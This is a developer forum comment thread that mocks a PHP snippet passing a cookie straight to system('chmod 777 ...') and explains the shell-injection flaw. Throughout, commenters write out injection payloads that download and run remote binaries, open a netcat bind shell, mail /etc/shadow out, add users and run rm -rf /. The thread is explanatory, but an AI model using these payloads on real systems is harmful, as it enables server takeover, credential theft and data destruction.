• meh (unregistered) in reply to PG4
    PG4:
    One day I brought this pattern up to the idiot leader of the group of devs. His answer was

    "God created 777 for a reason"

    He's right. The reason is to expose incompetents so they can be dealt with.

  • Thomas (unregistered) in reply to Brain537
    Brain537:
    $_COOKIE["$sessionid"] = "; wget http://myserv.com/evil.sh; chmod +x evil.sh; ./evil.sh";
    That's just silly. Why bother with chmod yourself when you can let the cookie take care of it?

    First request: $_COOKIE["$sessionid"] = "; wget http://myserv.com/evil.sh"; Subsequent request: $_COOKIE["$sessionid"] = "evil.sh; ./evil.sh";

  • challet (unregistered) in reply to Machtyn

    to write into the cookie (have to check the cookie name (usualy PHPSESSID) before by doing a request) :

    $ curl --cookie "phpsessid= ~ ; whatevercommandyouwanttodo" http://wtf.server.this.script.is.installed.on

  • aiyo (unregistered) in reply to Zuney-Tunes
    Zuney-Tunes:
    Wow, double penetration on command, vulnerability to injection, jaws opening so fast they hit the floor... this sounds like my kind of job!

    fixed.

  • linepro (unregistered) in reply to Lost
    Lost:
    $_COOKIE[$sessionid] = '/; [$[$RANDOM % 6] == 0] && echo "Hes dead Jim";rm -rf  / || echo "Roll again"';
    

    captcha: ingenium...... like the guy we thank for today's WTF

    On the plus side it'll stop deleting after it did rm /bin/rm.....

  • Anon-E-Moose (unregistered) in reply to Machtyn

    Or something more sinister like:

    $_COOKIE["$sessionid"] = " .; nc -l -p 8080 -e /bin/bash"

  • Nicolas Noble (unregistered) in reply to Machtyn

    There's a high chance that the contents of the cookies are verbatim what's being sent by the browser. So changing $_COOKIE["$sessionid"] should be as simple as tampering with your browser's cookies, which is dead simple.

  • Simon (unregistered) in reply to dguthurts

    Okay it does more than change permissions since it doesn't appear to validate the data or use escapeshellarg or similar to prevent arbitrary code execution. I'm not sure what restrictions systems place on cookie sessionid but I wouldn't rely on it since environments change.

    The attacker probably doesn't know there is such code running at first, but exposure of code is a common weakness in which case the attack escalates. Also if for example they hadn't disabled errors in the PHP config, the attacker might guess cookie information was being used in a system call from the errors created by trying mangled cookie names (this is the kind of thing attackers do. Even just random mangling of inputs to the web request sent is a fairly standard attack when more usual methods fail. Just mangle it and see what errors follow is a way of finding if validation is working, or if you can provoke unexpected error messages.

    I think the jaw dropping thing is that it exists at all, e.g. why on earth fiddle with sessionid or cookie files in the first place. That is it done badly is little surprise after finding it is done at all.

  • James R Curry (unregistered) in reply to Machtyn
    Machtyn:
    Konstantin:
    I don't fully understand this. Why is that bad?

    How one actually sets the $_COOKIE["$sessionid"], I'm not sure (rewrite the html or javascript and insert the equality line? modify the cookie the website wrote to your system?)

    Well, really the attacker has to gain some other kind of access to the system for this to be of use, but once they do, this can be used for privilege escalation.

    You don't need to rewrite the HTML or Javascript to take advantage of this. Just edit your cookies or send a custom HTTP request with a custom header to the server in question.

    Definitely a gigantic WTF.

  • James R Curry (unregistered) in reply to James R Curry
    James R Curry:
    Well, really the attacker has to gain some other kind of access to the system for this to be of use, but once they do, this can be used for privilege escalation.

    Oh, hell, scratch that. It's bloody doing chmod on the shell and taking unescaped input. Brilliant.

  • jonny_q (unregistered) in reply to Machtyn
    Machtyn:
    Konstantin:
    I don't fully understand this. Why is that bad?

    I could be wrong, but Celina Nunes hints at the problem:

    Celina Nunes:
    $_COOKIE["$sessionid"] = "/"; 
    system("chmod 777 " . $_COOKIE["$sessionid"]);

    Essentially, what an attacker will be able to do is make every single file readable, writeable, and executable for the owner, group, and all users.

    Yay! Free access to a linux system and every single file! Including root access, hash files, configurations, ... everything. Want to setup a zombie? There's your system.

    How one actually sets the $_COOKIE["$sessionid"], I'm not sure (rewrite the html or javascript and insert the equality line? modify the cookie the website wrote to your system?)

    This is the featured comment?

    This is executing the raw text of a cookie as a shell command and possibly as root...

    All I have to do is perform an HTTP request for this page with a nefarious cookie in it.

    Assuming that $sessionid = "php123456" (which you could probably guess at by looking at the other cookies in your browser) you just have to pass a header that says Cookie: php123456=.;rm -rf /

    See the semicolon? That will terminate the chmod command. Then you're on your way to borking someone's server.

  • toor (unregistered) in reply to Machtyn

    Root access? Dream on ... :)

    In case of a properly configured web server (running unprivileged) and non-world-writable file permissions, a "chmod 0777 <whatever>" command would simply fail and won't cause any harm at all.

    It gets a little bit more interesting in a shared hosting environments, where most security conscious platforms tend to run untrustworthy (user) code with user privileges. So the exploitable code someone uploads would eventually impact just his own files, not the server or other users.

  • Ben (unregistered) in reply to Machtyn
    Machtyn:
    How one actually sets the $_COOKIE["$sessionid"], I'm not sure (rewrite the html or javascript and insert the equality line? modify the cookie the website wrote to your system?)

    A 'cookie' is just a plain header. You could fake it with telnet if you'd like to. Lots of tools out there allow you to create a request with cookies of your choice, for testing purposes (I'm sure I could do that with curl for example, maybe wget as well).

    It boils down to a single line in the HTTP headers, which look like (from the top of my head)

    GET / HTTP 1.1 Host www.example.com Set-Cookie CrapHere

    (extra newline should 'commit' the request)

  • (cs) in reply to techpaul
    techpaul:
    b) sites set for 800 pixel width with widescreen displays these days

    Sites not set to a maximum width in the 800-960 range with screen widths these days. I shouldn't have to employ perspective correction to scan a line of text from the left margin to the right.

  • reductio ad ridiculum (unregistered)

    Considering that most of the "devs" on this site exhibit reading fail on the very comments of this site, I don't think we're going to get them to rtfm for best security practices.

    -R

  • Luiz Felipe (unregistered) in reply to Ralph
    Ralph:
    Crontab:
    you'd modify the cookie you already had and wait for the server to request it again.
    Servers never request cookies from the browser. Never. The browser may, if it is in a good mood, send them. If you don't understand that you are one of those who needs his/her mouse taken away.

    And just to protect my good (sock puppet) name from previous abuses, I didn't say I use the mouse for web development. I said the clueless ones (who doubtless use the mouse 99.8% of the day) need it taken away.

    You can play Counter Strike with command line?

    I am very fast using mouse shortcuts, because i am gamer and coder, then i am very fast using keyboard with one hand. its called fapper mode. no need to wast time picking mouse.

    But when coding, no need for mouse. and in web dev, i dont use designer, just freak control everything and you will be ok. aspnet designer is a bit of crap, but only noobs use it.

  • Damon (unregistered) in reply to Machtyn

    Oh, and it could get even worse than that. Should the server process have enough credentials, you could probably do this:

    $_COOKIE["$sessionid"] = "/tmp ; mail -s 'Lots of passwords' [email protected] < /etc/shadow";

    system("chmod 777 " . $_COOKIE["$sessionid"]);

    And various other horrendous things. File permissions are just the start. You could do anything with whatever credentials the server process has.

  • joule (unregistered) in reply to Machtyn

    You can easily forge the cookies in the browser, if you know the session id (which in php, you do, it's in another cookie), you just sent a header that sets the cookie to / ... no system access required.

  • (cs) in reply to PG4
    PG4:
    (I'm looking at you IBM. Why do the software license agreement text files have to be world write?)

    How else do they let you change the terms of the license agreement at your whim? Or, for that matter, anyone who hacks into your system's whim?

    Also, I feel the need to point out, installers that deposit world-readable files are very useful, for quickly identifying software packages that were written by people who have no concept of security, so are rife with security holes. I've found no other metric that can identify them so quickly, with no false-positives seen to date, after over 15 years in the industry. I've had a few instances that seemed like a false positive at the time, for example, adobe reader. But those only appeared to be because I wasn't given sufficient resources to really test them.

    Personally, though, I'd have preferred if management had simply let me ditch them on the spot, like I'd requested.

    PG4:
    Second RWTF, why does someone feel the need to make a system call to chmod. Let's see how well that works on non-*NIX systems.

    It works just fine on my work Windows PC. I don't know what your problem is. And, discounting embedded systems, which may not even have a filesystem, what other current OSes are there? MacOS is *NIX now (has been for over a decade) and VMS and BeOS are dead. So are a lot of other non-*NIX OSes I don't care to mention.

  • (cs)

    I finally see WTWTF is: they're not using PHP's own chmod() function.

  • (cs) in reply to Watson
    Watson:
    I finally see WTWTF is: they're not using PHP's own chmod() function.

    You may think you're being funny, but that wouldn't have nearly the code injection issues. Yeah, it'd still be problematic, because you could change the permission of any file on the system to which the web server had owner access or better. It's also still changing the permissions to something that should be a red flag to everyone. But it'd be much more difficult to leverage unvalidated input to the PHP built-in chmod function to install a rootkit.

  • JustSomeGuy (unregistered) in reply to Machtyn
    Machtyn:
    Konstantin:
    I don't fully understand this. Why is that bad?

    I could be wrong, but Celina Nunes hints at the problem:

    Celina Nunes:
    $_COOKIE["$sessionid"] = "/"; 
    system("chmod 777 " . $_COOKIE["$sessionid"]);

    Essentially, what an attacker will be able to do is make every single file readable, writeable, and executable for the owner, group, and all users.

    Yay! Free access to a linux system and every single file! Including root access, hash files, configurations, ... everything. Want to setup a zombie? There's your system.

    How one actually sets the $_COOKIE["$sessionid"], I'm not sure (rewrite the html or javascript and insert the equality line? modify the cookie the website wrote to your system?)

    I'm curious as to why you'd be running your web server with enough power to do something like "chmod 777 /" in the first place :-)

  • trollsolo (unregistered) in reply to Machtyn

    What the attacker can do is nothing really to do with permissions. Unless php/httpd running as root chmod 777 / wont work. The problem is that you can execute anything you want.

  • Johan Bergens (unregistered) in reply to Machtyn

    Cookies exist in free-text form on the client side. You only have to change the content of a text file for permanent cookies to change the value. For session cookies you need to inject javascript that change the value or create a fake request. The latter is very easy to do.

  • Karel Vervaeke (unregistered) in reply to Machtyn

    Just setting the sessionid cookie to '/' won't do much harm (even with '-R /', much depends on the process owner of the httpd/whatever process).

    The real harm is that you can use semi-colons to execute multiple commands:

    $sessionId='/tmp/whatever; cp /etc/passwd /var/www/...; sendsomespam; whatever'

  • me (unregistered) in reply to toor
    toor:
    Root access? Dream on ... :)

    In case of a properly configured web server [...]

    Properly configured web server? Dream on ... :P

  • grzes (unregistered) in reply to Machtyn
    Machtyn:
    Celina Nunes:
    $_COOKIE["$sessionid"] = "/"; 
    system("chmod 777 " . $_COOKIE["$sessionid"]);

    Essentially, what an attacker will be able to do is make every single file readable, writeable, and executable for the owner, group, and all users.

    Actually, "/" wouldn't work here. This would only allow to create some new (ignored by everyone) subdirs and files, not to modify existing ones. The only possible use would be to jam the filesystem by exhausting the drive space.

    However, "-R /" would do the trick. "-R" stands for for Recursive, meaning the change applies not only to the root directory itself, but also for all subdirs, their subdirs and all files in the entire system tree.

  • David (unregistered) in reply to Machtyn

    All you have to do is get a '; [shell command here]" in that sessionId and you've now got "chmod 777 stuff; shell command here]"

  • Alon (unregistered) in reply to Machtyn

    I am not sure how system() behaves in the specific language/OS.

    Anyhow, the above is also vulnerable to the chmod 777 some_file; rm -rf / .. :)

    (rm -rf deletes stuff in linux without prompting)

  • Graham Wills (unregistered) in reply to Machtyn

    Or imagine the following cookie:

    " . ; rm -fr /"

    any system call that can be parameterized by a user is a major disaster waiting to happen.

  • Cookie Monster (unregistered) in reply to Machtyn
    Machtyn:
    Konstantin:
    I don't fully understand this. Why is that bad?

    I could be wrong, but Celina Nunes hints at the problem:

    Celina Nunes:
    $_COOKIE["$sessionid"] = "/"; 
    system("chmod 777 " . $_COOKIE["$sessionid"]);

    Essentially, what an attacker will be able to do is make every single file readable, writeable, and executable for the owner, group, and all users.

    Yay! Free access to a linux system and every single file! Including root access, hash files, configurations, ... everything. Want to setup a zombie? There's your system.

    How one actually sets the $_COOKIE["$sessionid"], I'm not sure (rewrite the html or javascript and insert the equality line? modify the cookie the website wrote to your system?)

    It's not a recursive chmod, so at best it would set / to 777. Hardly a system breaker.

  • Roy (unregistered) in reply to Machtyn

    Frequently you can edit the set cookies directly from the browser.

  • (cs) in reply to Roy
    Roy:
    Frequently you can edit the set cookies directly from the browser.

    Show me how! I wud like to see this.

  • Daniel Crowley (unregistered) in reply to Machtyn

    This is a classic shell injection problem. It's bad enough that we can chmod 777 anything we like, but why don't we:

    /; rm -rf /

    or how about

    /; mail [email protected] < /etc/shadow

    or why not

    /; wget http://attacker.com/malware.bin; chmod 777 malware.bin ; ./malware.bin

    We can run any shell command on the server this way without even having access to anything but the web application before.

  • Galaxor (unregistered) in reply to Machtyn

    The cookie is sent via your browser over http. You can send whatever cookies you want.

  • Jason (unregistered) in reply to Tekiegreg

    Effectively this was a cookie - command injection that opened up someone's entire file system"

    Surely only if the relevant process runs as root. Otherwise, you have access only to the files accessible to the permissions of the database server/webserver/whatever this was. Still serious, but not quite root access (at least, without more work.)

  • Jason (unregistered) in reply to Machtyn

    Essentially, what an attacker will be able to do is make every single file readable, writeable, and executable for the owner, group, and all users.

    Also, depending on what kind of character filtering goes on with cookies by default (I'm not a web developer, I don't know), you could devise a cookie with "dummyfile ; arbitrary_command", and, assuming the default system() uses the bash shell, you can run any arbitrary command with the same permissions as the process which uses this code.

  • Kimberly (unregistered) in reply to Machtyn
    $_COOKIE['$sessionid'] = '; rm -rf /';

    Something like this should remove everything PHP has write access to.

  • Seb Wiers (unregistered) in reply to Machtyn

    @Machty- yeah, you'd probably either modify the cookie on your system, or spoof a cookie return value in your HTTP header. From my limited exposure, I'd say both are pretty easy to do using common freeware dev tools. However, without seeing the code base, I can't see how you'd ever consider it as an attack vector.

  • Dent (unregistered) in reply to Machtyn

    You can easily change the cookie on your side (browser/script). And if you set it to "; rm -rf /" or that like, you can cause quite some fun. - So I believe there's a very easy "shell" injection.

  • Dent (unregistered) in reply to Dent

    Blah, I saw only the 1st comment and thought that's all there is. Oh well...

  • englebart (unregistered) in reply to Machtyn

    How about modifying the cookie to look more like:

    /; echo ftp -get ftp://hackers.rule.com/pownServer /ps; ps&;

    This basically allows any command at all to be executed on the remote server with the slight annoyance that you have to run a chmod first each time. An inconvenience that a hacker would be willing to accept.

  • Me (unregistered)

    Yes, now you need to login to the server too...

  • forch (unregistered) in reply to Machtyn
    Bob:
    every single file

    Unless this 'linux' system has the web server running as root (duh), the "user" would never gain access to every single file. Only from the root path of the web server itself, e.g. "var/www/", but never /etc/passwd or similar.

  • Powerslave (unregistered) in reply to Machtyn

    javascript:void(document.cookie="PHPSESSID=.htpasswd");

    Just for an example, as it is likely that the default name for it was never changed ;) If it was, you can still look up your cookies for that (javascript:alert(document.cookie);)

  • emcee (unregistered) in reply to Machtyn

    Browsers send cookies to the server, which are supposed to be hashes that uniquely identify the browser to the server. The server is supposed to use that hash to pull session-specific data that it stores, such as the items in your cart.

    In this case, you could arbitrarily inject whatever data into the cookie you wanted. Such that:

    $_COOKIE["$sessionid"] = "/; useradd -D --shell /bin/bash -p easypassword;";

    system("chmod 777 " . $_COOKIE["$sessionid"]);

    Which creates a new user after giving full permissions to all users on the filesystem. Pretty much a root user. I'm sure you could add onto that to ensure ssh access to fully compromise a machine.

  • Rob Gridley (unregistered) in reply to Machtyn

    I think you'd need a -R in there to do what you're describing, but it's still bad. You could one at a time enable rwx for everyone on various files.

  • Jo (unregistered) in reply to Machtyn

    To inject a cookie, all you need is a browser or command-line tools that lets the user specify a different value. Not sure about the browser, but I guess a quick search in the Firefox add-ons repository will quickly turn up something. For the command line, wget has an option to do exactly that; it's there for testing websites and such.

  • kb (unregistered) in reply to Machtyn

    Not to mention scenarios like:

    $_COOKIE["$sessionid"] = "/; cat /var/www/site1/dbconfig.php";

  • David Castagna (unregistered) in reply to Machtyn

    Well wouldn't this be even worse?:

    $_COOKIE["$sessionid"] = "damn near any Unix command you want to use";

    Like for example a bit of command line perl to create a simple keystroke logger in the root account.

    Or dump the password file to some location in the web server's path as an html file:

    $_COOKIE["$sessionid"] = "cat /etc/passwd > ..../readme.txt";

    The possibilities are truly endless.

    And god help these people if they are running their server as the root account. You can have alot of fun with rsh.

Leave a comment on “The Deadly Cookie”

Log In or post as a guest

Replying to comment #:

« Return to Article